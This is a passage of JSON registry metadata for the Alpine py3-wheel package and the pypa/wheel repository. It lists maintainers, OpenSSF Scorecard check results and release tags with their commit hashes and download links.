ues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":90,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-02-01T10:04:49.885Z","updated_at":"2023-02-01T10:04:49.885Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.16","url":"https://pkgs.alpinelinux.org/packages?branch=v3.16","ecosystem":"alpine","default":false,"packages_count":17040,"maintainers_count":328,"namespaces_count":2,"keywords_count":2855,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":924},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.662Z","updated_at":"2026-06-10T05:18:19.682Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/namespaces"}},{"id":10330749,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":2,"first_release_published_at":"2024-04-12T09:43:36.000Z","latest_release_published_at":"2026-04-22T18:33:23.000Z","latest_release_number":"0.42.0-r2","last_synced_at":"2026-05-11T14:20:24.124Z","created_at":"2024-06-11T02:38:27.331Z","updated_at":"2026-05-11T14:20:24.125Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.20/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v